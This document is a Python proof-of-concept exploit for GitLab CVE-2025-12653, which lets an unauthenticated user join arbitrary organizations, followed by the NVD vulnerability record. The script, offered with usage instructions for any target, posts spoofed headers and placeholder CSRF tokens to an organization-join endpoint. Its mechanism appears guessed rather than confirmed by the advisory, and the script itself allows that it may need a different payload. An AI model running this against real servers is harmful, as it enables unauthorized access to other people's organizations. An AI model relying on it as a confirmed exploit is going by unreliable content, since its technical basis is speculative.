CVE-2025-12653

import requests import sys # CVE-2025-12653 PoC - GitLab Unauthorized Organization Join # Description: Unauthenticated user can join arbitrary organizations by modifying HTTP headers def exploit_gitlab(target_url, target_org): """ Exploit GitLab CVE-2025-12653 Target: GitLab CE/EE versions 18.3 before 18.4.5, 18.5 before 18.5.3, 18.6 before 18.6.1 """ print(f"[*] Targeting GitLab instance: {target_url}") print(f"[*] Attempting to join organization: {target_org}") # Target endpoint for joining organizations join_url = f"{target_url}/-/organizations/join" # Crafted headers to exploit the vulnerability # Attackers modify request headers to bypass authentication checks headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'application/json', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/json', # Manipulated headers that trigger the vulnerability 'X-Forwarded-Host': target_org, 'X-Original-URL': f"/-/organizations/{target_org}/join", 'Referer': f"{target_url}/organizations/{target_org}", 'X-CSRF-Token': '任意token值' } # Payload to join arbitrary organization payload = { 'organization_path': target_org, 'authenticity_token': 'manipulated_token' } try: # Send malicious request without authentication response = requests.post( join_url, headers=headers, json=payload, timeout=30, verify=False ) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:500]}") # Check if exploitation was successful if response.status_code == 200 or 'success' in response.text.lower(): print(f"[!] VULNERABLE: Successfully joined organization {target_org}") return True else: print(f"[-] Possibly patched or requires different payload") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-12653.py <target_url> <organization_name>") print("Example: python cve-2025-12653.py https://gitlab.example.com target_org") sys.exit(1) target = sys.argv[1] org = sys.argv[2] exploit_gitlab(target, org)

{"cve": {"id": "CVE-2025-12653", "sourceIdentifier": "[email protected]", "published": "2025-11-26T20:15:49.023", "lastModified": "2025-12-10T23:15:47.973", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that under specific conditions could have allowed an unauthenticated user to join arbitrary organizations by changing headers on some requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5", "matchCriteriaId": "D158EE55-B264-47D6-9FEF-5E047E9F777D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.4.5", "matchCriteriaId": "9EFADCA0-3C50-4E66-8189-AE419FA8EBC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3", "matchCriteriaId": "A2361C72-A29E-47BB-A3FD-E4D656AF820F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3", "matchCriteriaId": "1B00EBAB-22CC-4350-AED2-60C7F78C0A8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:community:*:*:*", "matchCriteriaId": "E53003CF-149D-45C9-8574-B57FDE1F1612"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "200F0D66-67E2-4C9B-98C5-2F57FF5D7611"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/26/patch-release-gitlab-18-6-1-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/579372", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3370245", "source": "[email protected]", "tags": ["Permissions Required"]}]}}